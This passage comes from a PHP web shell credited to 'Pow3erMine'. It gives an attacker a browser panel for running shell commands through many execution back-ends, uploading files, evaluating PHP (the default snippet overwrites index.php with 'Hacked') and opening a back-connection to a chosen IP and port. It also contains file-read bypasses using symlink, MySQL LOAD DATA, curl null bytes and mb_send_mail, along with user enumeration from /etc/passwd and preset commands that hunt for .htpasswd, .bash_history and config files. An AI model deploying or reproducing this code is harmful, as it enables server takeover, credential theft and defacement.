  1562. <input name="curDir" type="text" id="curDir" value="<?php if($_POST['Execute']){echo $_POST['curDir'];} else {echo getcwd();} ?>" size="70"></td>
  1563. </tr>
  1564. </table>
  1565. </form>
  1566. <!-- End Of Command Line-->
  1567. </td>
  1568. <td width='30%' height='30' valign="top">
  1569. <!-- Commands Alias-->
  1570. <form method='POST' enctype="multipart/form-data">
  1571. <table width='100%' height='72' border='0' id='Box'>
  1572. <tr>
  1573. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  1574. <td style="background-color:#666;padding-left:10px;">Upload Files <span style="padding-left:10px;">
  1575. <input type='button' value='+' id='addUpload' size='5' onclick='addUploadInput();'>
  1576. <input name='UPLOAD_Execute' type='submit' id="UPLOAD_Execute" value='Upload Files'>
  1577. </span></td>
  1578. </tr>
  1579. <tr>
  1580. <td height="45" colspan="2">
  1581. <input type='file' name='uploadfile[]'>
  1582. <input type='file' name='uploadfile[]'><div id='uploadInput'></div></td>
  1583. </tr>
  1584. </table>
  1585. </form>
  1586. <!-- End Of Commands Alias-->
  1587. </td>
  1588. </tr>
  1589. <tr valign="top">
  1590. <td width='30%'>
  1591. <!-- Commands Alias-->
  1592. <form method='POST' enctype="multipart/form-data">
  1593. <table width='100%' height='72' border='0' id='Box'>
  1594. <tr>
  1595. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  1596. <td style="background-color:#666;padding-left:10px;">PHP Eval
  1597. <input name="PHP_Execute" type="submit" id="PHP_Execute" onClick="document.getElementById('PHP_Line').value = encodeURIComponent(document.getElementById('PHP_Line').value);" value="Evaluate"></td>
  1598. </tr>
  1599. <tr>
  1600. <td height="45" colspan="2"><label for="PHP_Line"></label>
  1601. <textarea name="PHP_Line" id="PHP_Line" cols="50" rows="2"><?php if($_POST['PHP_Execute']){echo urldecode(filter($_POST['PHP_Line']));}else {echo '$file = fopen("index.php","w+");
  1602. fwrite($file,"Hacked");
  1603. fclose($file);';}
  1604. ?>
  1605. </textarea>
  1606. <br></td>
  1607. </tr>
  1608. </table>
  1609. </form>
  1610. <!-- End Of Commands Alias-->
  1611. </td>
  1612. <td width='30%' height='30'>
  1613. <!-- Commands Alias-->
  1614. <form method='POST' enctype="multipart/form-data">
  1615. <table width='100%' height='72' border='0' id='Box'>
  1616. <tr>
  1617. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  1618. <td style="background-color:#666;padding-left:10px;">Read Files
  1620. <select name="READ_Type" >
  1621. <option value="file" >file</option>
  1622. <option value="fgets" >fgets</option>
  1623. <option value="fgetss" >fgetss</option>
  1624. <option value="readfile" >readfile</option>
  1625. <option value="fread" >fread</option>
  1626. <option value="show_source" >show_source</option>
  1627. <option value="file_get_contents" >file_get_contents</option>
  1628. <option value="tempnam" >tempnam</option>
  1629. <option value="copy" >copy</option>
  1630. <option value="symlink" >Symlink</option>
  1631. <option value="mb_send_mail" >mb_send_mail</option>
  1632. <option value="highlight_file" >highlight_file</option>
  1633. <option value="curl" >Curl</option>
  1634. <option value="imap" >Imap</option>
  1635. <option value="mysql" >MySQL</option>
  1636. <option value="mysqli" >MySQLI</option>
  1637. <option value="ioncube">Ion Cube</option>
  1638. <option value="error_log">Error_Log</option>
  1639. <option value="include">Include</option>
  1640. <option value="id" >ID /etc/passwd</option>
  1641. </select>
  1642. <input name="READ_Execute" type="submit" id="READ_Execute" onClick="document.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td>
  1643. </tr>
  1644. <tr>
  1645. <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td>
  1646. </tr>
  1647. </table>
  1648. </form>
  1649. <!-- End Of Commands Alias-->
  1650. </td>
  1651. <td width='30%' height='30' valign="top">
  1652. <!-- Commands Alias-->
  1653. <form method='POST' enctype="multipart/form-data">
  1654. <table width='100%' height='72' border='0' id='Box'>
  1655. <tr>
  1656. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  1657. <td style="background-color:#666;padding-left:10px;">Back Connection
  1658. <input name='CON_Execute' type='submit' id="CON_Execute" value='Connect'></td>
  1659. </tr>
  1660. <tr>
  1661. <td height="45" colspan="2"><input type="text" name="ip" value="<?php if($_POST['CON_Execute']){echo $_POST['ip']; }else {echo GetRealIP(); } ?>" />
  1662. <input type="text" name="port" value="<?php if($_POST['CON_Execute']){echo $_POST['port']; }else {echo "443"; } ?>" />
  1663. <select name="CON_Type" >
  1664. <option value="socks">SOCKS</option>
  1665. <option value="fsockopen">FSOCKOPEN</option>
  1666. </select>
  1667. </td>
  1668. </tr>
  1669. </table>
  1670. </form>
  1671. <!-- End Of Commands Alias-->
  1672. </td>
  1673. </tr>
  1674. </table>
  1675. <?php
  1676. function IncludeReader($path) {
  1677. global $os;
  1678. if($os == "Windows"){$slash = "\\";}else{$slash = "/";}
  1679. $fileName = substr(strrchr($path,$slash),1);
  1680. $includePath = substr($path,0,strpos($path,$fileName,0));
  1681. ini_set("include_path",$includePath);
  1682. include($fileName);
  1683. }
  1684. function GetUsers1() {
  1685. return Exe('ls /var/mail');
  1686. }
  1687. function GetUsers2() {
  1688. $array = array();
  1689. $lines = file("/etc/passwd");
  1690. foreach($lines as $nr=>$val) {
  1691. $str = explode(":",$val);
  1692. array_push($array,$str[0]);
  1693. }
  1694. return $array;
  1695. }
  1696. function GetUsers3() {
  1697. $array = array();
  1698. if ($dh = opendir("/home/")) {
  1699. while (($file = readdir($dh)) !== false) {
  1700. array_push($array,$file);
  1701. }
  1702. closedir($dh);
  1703. return $array;
  1704. }
  1705. }
  1706. function GetUsers4() {
  1707. $dir = "/home/";
  1708. $array = array();
  1709. if ($dh = opendir($dir)) {
  1710. $f = readdir($dh);
  1711. while (($f = readdir($dh)) !== false) {
  1712. $dh2=opendir($dir."/");
  1713. $f2 = readdir($dh2);
  1714. while (($f2 = readdir($dh2)) !== false) {
  1715. $f2.="/";
  1716. $dh3=opendir($dir.$f.$f2);
  1717. $f3 = readdir($dh3);
  1718. while (($f3 = readdir($dh3)) !== false) {
  1719. array_push($array,$f3);
  1720. }
  1721. }
  1722. }
  1723. closedir($dh);
  1724. return $array;
  1725. }
  1726. }
  1727. function GetUsers5(){
  1728. return realpath('/etc/passwd');
  1729. }
  1730. function ErrorLog($path){
  1731. $tempFile = uniqid();
  1732. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  1733. error_log(file_get_contents($path), 3, $tempFile);
  1734. $content = file_get_contents($tempFile);
  1735. unlink($tempFile);
  1736. return $content;
  1737. }
  1738. function SymlinkF($path) {
  1739. $tempFile = uniqid();
  1740. if(function_exists('symlink')) {
  1741. symlink($path,$tempFile);
  1742. $content = file_get_contents($tempFile);
  1743. unlink($tempFile);
  1744. return $content;
  1745. }
  1746. }
  1747. function MySQLReader($path) {
  1748. global $DBhost,$DBuser,$DBpass;
  1749. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  1750. $con = mysql_connect($DBhost,$DBuser,$DBpass);
  1751. mysql_query("CREATE DATABASE a");
  1752. mysql_query("CREATE TABLE a.a (a varchar(1024))");
  1753. mysql_query("GRANT SELECT,INSERT ON a.a TO '".$DBuser."'");
  1754. mysql_query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a") or die(mysql_error());
  1755. $result = mysql_query("SELECT a FROM a.a");
  1756. while(list($row) = mysql_fetch_row($result)){print $row . chr(10);}
  1757. mysql_query("DROP DATABASE a");
  1758. }
  1759. function MySQLIReader($path) {
  1760. global $DBhost,$DBuser,$DBpass;
  1761. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  1762. $con = mysql_connect($DBhost,$DBuser,$DBpass);
  1763. mysql_query("CREATE DATABASE a");
  1764. mysql_query("CREATE TABLE a.a (a varchar(1024))");
  1766. function r($fp, &$buf, $len, &$err) {
  1767. print fread($fp, $len);
  1768. }
  1769. $m = new mysqli($DBhost, $DBuser, $DBpass, 'a');
  1770. $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
  1771. $m->set_local_infile_handler("r");
  1772. $m->query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a");
  1773. $m->close();
  1774. }
  1775. function DBConnect($host,$user,$pass,$db) {
  1776. $connect = mysql_pconnect($host,$user,$pass);
  1777. if(!$connect){echo "Can't Connect to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false; }
  1778. else {
  1779. $tryToSelectDB = mysql_select_db($db,$connect);
  1780. if(!$tryToSelectDB){echo "Can't Enter The Database [ ".$db." ]"; return false; }
  1781. else{return true; return $connect;}
  1782. }
  1783. }
  1784. function ReadId($path) {
  1785. for($uid=0;$uid<60000;$uid++) {
  1786. $ara = posix_getpwuid($uid);
  1787. if (!empty($ara)){while (list ($key, $val) = eah($ara)){$content .= $val;}
  1788. }
  1789. }
  1790. return $content;
  1791. }
  1792. function ImapF($path) {
  1793. $stream = imap_open($path, "", "");
  1794. $str = imap_body($stream, 1);
  1795. imap_close($stream);
  1796. return $str;
  1797. }
  1798. function FileF($path) {
  1799. $lines = file($path); foreach($lines as $line){$content .= $line;}
  1800. return $content;
  1801. }
  1802. function CopyF($path) {
  1803. $tempFile = md5(uniqid()).".bb";
  1804. copy($path,$tempFile);
  1805. $content = file_get_contents($tempFile);
  1806. unlink($tempFile);
  1807. return $content;
  1808. }
  1809. function fgetssF($path) {
  1810. while(($line = fgetss($path)) != false){$content .= $line;}
  1811. return $content;
  1812. }
  1813. function highlightFile($path) {
  1814. return highlight_file($path);
  1815. }
  1816. function mbSendEmail($path) {
  1817. if(function_exists('mb_send_mail')) {
  1818. $tempFile = uniqid();
  1819. $additional_param = "-C ".$path." -X ".getcwd()."/".$tempFile;
  1820. mb_send_mail("", NULL, NULL, NULL, $additional_param);
  1821. $content = file_get_contents($tempFile);
  1822. unlink($tempFile);
  1823. return $content;
  1824. }
  1825. }
  1826. function DeleteFile($fileName) {
  1827. global $os;
  1828. if(function_exists('unlink'))
  1829. {$delete = unlink($fileName);}
  1830. if((!$delete) && ($os == 'Windows'))
  1831. {$delete = Exe("del $fileName"); }
  1832. else if((!$delete) && ($os == 'Linux'))
  1833. {$delete = Exe("rm -f $fileName");}
  1834. if($delete){return true;}else{return false;}
  1835. }
  1836. function CurlFileRead($path) {
  1837. $ch = curl_init("file://".$path."\x00".__FILE__);
  1838. var_dump(curl_exec($ch));
  1839. }
  1840. function FReadF($path) {
  1841. $file = fopen($path,'r+'); //Open The File
  1842. if(function_exists('fread')){htmlspecialchars(fread($file,filesize($file)));}
  1843. fclose($file);
  1844. }
  1845. function TempnameF($path) {
  1846. global $dir;
  1847. $temp = tempnam($dir, "cx");
  1848. if(copy("compress.zlib://".$path, $temp)) {
  1849. $handler = fopen($temp, "r");
  1850. $readFile = fread($handler, @filesize($temp));
  1851. fclose($handler);
  1852. $content .= htmlspecialchars($filename);
  1853. $content .= nl2br(htmlspecialchars($readFile));
  1854. $content .= htmlspecialchars($filename);
  1855. unlink($temp);
  1856. return $content;
  1857. }
  1858. }
  1859. function Evaluation($eval) {
  1860. $eval = str_replace(array("<?php","<?","?>"),"",$eval);
  1861. $eval = eval($eval);
  1862. if($eval){return true;}else{return false;}
  1863. }
  1864. function Oracle() {
  1865. if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';}
  1866. else {$oracle = '<font color="green">OFF</font>';}return $oracle;
  1867. }
  1868. function MsSQL() {
  1869. if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';}
  1870. else {$msSQL = '<font color="green">OFF</font>';}return $msSQL;
  1871. }
  1872. function MySQL2() {
  1873. $mysql_try = function_exists('mysql_connect');
  1874. if($mysql_try){$mysql = '<font color="red">ON</font>';}
  1875. else {$mysql = '<font color="green">OFF</font>';}return $mysql;
  1876. }
  1877. function MSQL() {
  1878. if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';}
  1879. else {$mSql = '<font color="green">OFF</font>';}return $mSql;
  1880. }
  1881. function MysqlI() {
  1882. if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';}
  1883. else {$mysqli = '<font color="green">OFF</font>';}return $mysqli;
  1884. }
  1885. function Gzip() {
  1886. if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';}
  1887. else {$gzip = '<font color="green">OFF</font>';}return $gzip;
  1888. }
  1889. function openBaseDir() {
  1890. $openBaseDir = ini_get("open_basedir");
  1891. if (!$openBaseDir){$openBaseDir = '<font color="green">OFF</font>';}
  1892. else {$openBaseDir = '<font color="red">ON</font>';}
  1893. return $openBaseDir;
  1894. }
  1895. function Curl() {
  1896. if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';}
  1897. else{$curl = '<font color="green">OFF</font>';}return $curl;
  1898. }
  1899. function magicQouts() {
  1900. if(function_exists('get_magic_quotes_gpc')){$mag = get_magic_quotes_gpc();}
  1901. if (empty($mag)){$mag = '<font color="green">OFF</font>';}
  1902. else {$mag= '<font color="red">ON</font>';}return $mag;
  1903. }
  1904. function SafeMode() {
  1905. $safe_mode = ini_get("safe_mode");
  1906. if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';}
  1907. else {$safe_mode = '<font color="red">ON</font>';}
  1908. return $safe_mode;
  1909. }
  1910. function DisableFunctions() {
  1911. $disfun = ini_get('disable_functions');
  1912. if (empty($disfun)){$disfun = '<font color="green">NONE</font>';}return $disfun;
  1913. }
  1914. function RegisterGlobals() {
  1915. if(ini_get('register_globals')){$registerg= '<font color="red">ON</font>';}
  1916. else{$registerg= '<font color="green">OFF</font>';}return $registerg;
  1917. }
  1918. function GetRealIP() {
  1919. if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);}
  1920. elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}
  1921. else {$ip=getenv(REMOTE_ADDR);}
  1922. return $ip;
  1923. }
  1924. function SelectCommand($os) {
  1925. global $os;
  1926. if($os == 'Windows') {
  1927. echo "
  1928. <select name='alias' id='alias' onChange='AddAlias();' >
  1929. <option value=''>NONE</option>
  1930. <option value='dir' >List Directory</option>
  1931. <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
  1932. <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</option>
  1933. <option value='netstat -an'>Show active connections</option>
  1934. <option value='net start'>Show running services</option>
  1935. <option value='tasklist'>Show Pro</option>
  1936. <option value='net user'>User accounts</option>
  1937. <option value='net view'>Show computers</option>
  1938. <option value='arp -a'>ARP Table</option>
  1939. <option value='ipconfig /all'>IP Configuration</option>
  1940. <option value='netstat -an'>netstat -an</option>
  1941. <option value='systeminfo'>System Informations</option>
  1942. <option value='getmac'>Get Mac Address</option>
  1943. </select>
  1944. ";
  1945. }
  1946. else {
  1947. echo "
  1948. <select name='alias' id='alias' onChange='AddAlias();' >
  1949. <option value=''>NONE</option>
  1950. <option value='ls -la'>List dir</option>
  1951. <option value='cat /etc/hosts'>IP Addresses</option>
  1952. <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
  1953. <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
  1954. <option value='netstat -an | grep -i listen'>show opened ports</option>
  1955. <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
  1956. <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
  1957. <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
  1958. <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
  1959. <option value='find / -type f -name'>find files</option>
  1960. <option value='find / -type f -name \"config*\"'>find config* files</option>
  1961. <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
  1962. <option value='find / -perm -2 -ls'>find all writable folders and files</option>
  1963. <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
  1964. <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
  1965. <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
  1966. <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
  1967. <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
  1968. <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
  1969. <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
  1970. <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
  1971. <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
  1972. <option value='locate httpd.conf'>locate httpd.conf files</option>
  1973. <option value='locate vhosts.conf'>locate vhosts.conf files</option>
  1974. <option value='locate proftpd.conf'>locate proftpd.conf files</option>
  1975. <option value='locate psybnc.conf'>locate psybnc.conf files</option>
  1976. <option value='locate my.conf'>locate my.conf files</option>
  1977. <option value='locate admin.php'>locate admin.php files</option>
  1978. <option value='locate cfg.php'>locate cfg.php files</option>
  1979. <option value='locate conf.php'>locate conf.php files</option>
  1980. <option value='locate config.dat'>locate config.dat files</option>
  1981. <option value='locate config.php'>locate config.php files</option>
  1982. <option value='locate'>locate files</option>
  1983. <option value='locate'>locate</option>
  1984. <option value='locate config.default.php'>locate config.default.php files</option>
  1985. <option value='locate config'>locate config* files </option>
  1986. <option value='locate \".conf\"'>locate .conf files</option>
  1987. <option value='locate \".pwd\"'>locate .pwd files</option>
  1988. <option value='locate \".sql\"'>locate .sql files</option>
  1989. <option value='locate \".htpasswd\"'>locate .htpasswd files</option>
  1990. <option value='locate \".bash_history\"'>locate .bash_history files</option>
  1991. <option value='locate \".mysql_history\"'>locate .mysql_history files</option>
  1992. <option value='locate \".fetchmailrc\"'>locate .fetchmailrc files</option>
  1993. <option value='locate backup'>locate backup files</option>
  1994. <option value='locate dump'>locate dump files</option>
  1995. <option value='locate priv'>locate priv files</option>
  1996. </select>
  1997. ";
  1998. }
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  2096. function openPHPInfo(){my_window= (\"?info=getPhpInfo\",\"PHP Info\",\"width=800,height=600,scrollbars=1\"); }
  2097. function AddAlias(){document.getElementById('CMD_Line').value = document.getElementById('alias').value; }
  2098. function addUploadInput(){document.getElementById('uploadInput').innerHTML += '<input type=\'file\' name=\'uploadfile[]\'>'; }
  2099. function change_dir_mode() {
  2100. var dir_mode = document.getElementById('dir_mode').value;
  2101. document.location = '?dir_mode='+dir_mode;
  2102. }
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  2104. ";
  2105. return $css;
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  2107. function filter($string) {
  2108. if(get_magic_quotes_gpc() != 0){return stripslashes($string); }
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  2111. function footer() {
  2112. echo '
  2113. <table width="100%">
  2114. <tr>
  2115. <td width="100%"><center>
  2116. <sy> ? </sy>Copyright © 2002-2014 Pow3erMine - All rights reserved.<sy> ?</sy></b><br/>
  2118. <sy> ? </sy>Skype: Pow3rMine | Email:<sy> ?</sy></b>
  2119. </center></td>
  2120. </tr>
  2121. </table>
  2122. </body></html>
  2123. ';
  2124. }
  2125. function print_exe_method() {
  2126. global $os; global $exec_method;
  2127. if($os == "Linux") {
  2128. ?>
  2129. <select name="exe_method" >
  2130. <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
  2131. <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system</option>
  2132. <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec</option>
  2133. <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
  2134. <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
  2135. <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
  2136. <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
  2137. <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
  2138. </select>
  2139. <?php
  2140. } else {
  2141. ?>
  2142. <select name="exe_method" >
  2143. <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
  2144. <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system()</option>
  2145. <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec()</option>
  2146. <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
  2147. <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
  2148. <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
  2149. <option value="win_shell_execute" <?php if($exec_method == "win_shell_execute") {echo "selected";} ?>>win_shell_execute()</option>
  2150. <option value="win32_create_service" <?php if($exec_method == "win32_create_service") {echo "selected";} ?>>win32_create_service()</option>
  2151. <option value="ffi" <?php if($exec_method == "ffi") {echo "selected";} ?>>ffi</option>
  2152. <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
  2153. <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
  2154. <option value="slash_bypass <?php if($exec_method == "slash_bypass") {echo "selected";} ?>">slash bypass</option>
  2155. </select>
  2156. <?php
  2157. }
  2158. }
  2159. function Exe($command) {
  2160. global $dir;global $os;global $exec_method;
  2161. $command = filter($command);
  2163. if($exec_method == "exec") {
  2164. exec($command,$output);echo join("\n",$output);
  2165. } else if($exec_method == "system") {
  2166. system($command);
  2167. } else if($exec_method == "shell_exec") {
  2168. echo shell_exec($command);
  2169. } else if($exec_method == "passthru") {
  2170. passthru($command);
  2171. } else if($exec_method == "proc_open") {
  2172. echo proc_exec($command,$dir);
  2173. } else if($exec_method == "popen") {
  2174. $fp = popen($command,"r");{while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}echo convert_cyr_string($result,"d","w");
  2175. } else if($exec_method == "win_shell_execute") {
  2176. echo winshell($command);
  2177. } else if($exec_method == "win32_create_service") {
  2178. echo srvshell($command);
  2179. } else if($exec_method == "ffi") {
  2180. echo ffishell($command);
  2181. } else if($exec_method == "perl") {
  2182. echo perlshell($command);
  2183. } else if($exec_method == "python") {
  2184. echo python_eval("import os\nos.system('".$command."')");
  2185. } else if($exec_method == "slash_bypass") {
  2186. echo slashBypass($command);
  2187. }
  2188. }
  2189. function proc_exec($com , $dir) {
  2190. $start_pipe=array(0=>array("pipe","w"),1=>array("pipe","w"));
  2191. $process=proc_open($com,$start_pipe,$pipes,$dir,NULL);
  2192. return stream_get_contents($pipes[1]);
  2193. }
  2194. function winshell($command) {
  2195. $name=whereistmP()."\\".uniqid('NJ');
  2196. win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
  2197. sleep(1);
  2198. $exec=file_get_contents($name);
  2199. DeleteFile($name);
  2200. return $exec;
  2201. }
  2202. function srvshell($command) {
  2203. $name=whereistmP()."\\".uniqid('NJ');
  2204. $n=uniqid('NJ');
  2205. $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
  2206. win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
  2207. win32_start_service($n);
  2208. win32_stop_service($n);
  2209. win32_delete_service($n);
  2210. while(!file_exists($name))sleep(1);
  2211. $exec=file_get_contents($name);
  2212. DeleteFile($name);
  2213. return $exec;
  2214. }
  2215. function ffishell($command) {
  2216. $name=whereistmP()."\\".uniqid('NJ');
  2217. $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  2218. $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
  2219. while(!file_exists($name))sleep(1);
  2220. $exec=file_get_contents($name);
  2221. DeleteFile($name);
  2222. return $exec;
  2223. }
  2224. function perlshell($command) {
  2225. $perl=new perl();
  2226. ob_start();
  2227. $perl->eval("system('".$command."')");
  2228. $exec=ob_get_contents();
  2229. ob_end_clean();
  2230. return $exec;
  2231. }
  2232. function slashBypass($cmd) {
  2233. GenerateFile("cmd.bat","$cmd>sy3.txt"."\r\n exit");
  2234. exec("\start cmd.bat");
  2235. $content = file_get_contents('sy3.txt');
  2236. unlink('sy3.txt');
  2237. return $content;
  2238. }
  2239. function GenerateFile($name,$content) {
  2240. if(function_exists('fopen') && function_exists('fclose')) {
  2241. $file = fopen($name,"w+");
  2242. if($file) {
  2243. if(function_exists('fwrite')){$writeFile = fwrite($file,$content); }
  2244. else if (function_exists('fputs')){$writeFile = fputs($file,$content); }
  2245. else if (function_exists('file_put_contents')){$writeFile = file_put_contents($file,$content);}
  2246. if(!$writeFile){return false;}
  2247. }
  2248. else{return false;}fclose($file);return true;
  2249. }
  2250. }
  2251. function ScanDirs() {
  2252. global $os; global $dir;global $safeMode;global $dir_mode;
  2253. if($dir_mode == "cmd"){if($os == "Windows"){Exe('dir');}else{ Exe('ls -lia');}}
  2254. else {
  2255. $result .= "Perms Size Time Owner/Group R/W Type File
  2256. -----------------------------------------------------------------------------
  2257. ";
  2258. $handel = opendir($dir);
  2259. while(($file = readdir($handel))!= false)
  2260. {
  2261. $size = filesize($file);
  2262. if(filetype($file) == "dir"){$type = "<DIR>";}else {$type = "<FILE>";}
  2263. if(fileowner($file)){$owner = fileowner($file);}else{$owner = "NONE";}
  2264. if(filegroup($file)){$group = filegroup($file);}else{$group = "NONE";}
  2265. $perms = fileperms($file);
  2266. $time = date("y/m/d", filectime($file));
  2267. if(is_writable($file)){$isWritable = "Y";}else{$isWritable = "N";}
  2268. if(is_readable($file)){$isReadable = "Y";}else{$isReadable = "N";}
  2269. $result .= $perms." ".$size." ".$time." ".$owner."/".$group." ".$isReadable."/".$isWritable." ".$type." ".$file."
  2270. ";
  2271. }
  2272. }
  2273. return $result;
  2274. }
  2275. echo footer();
  2276. ?>
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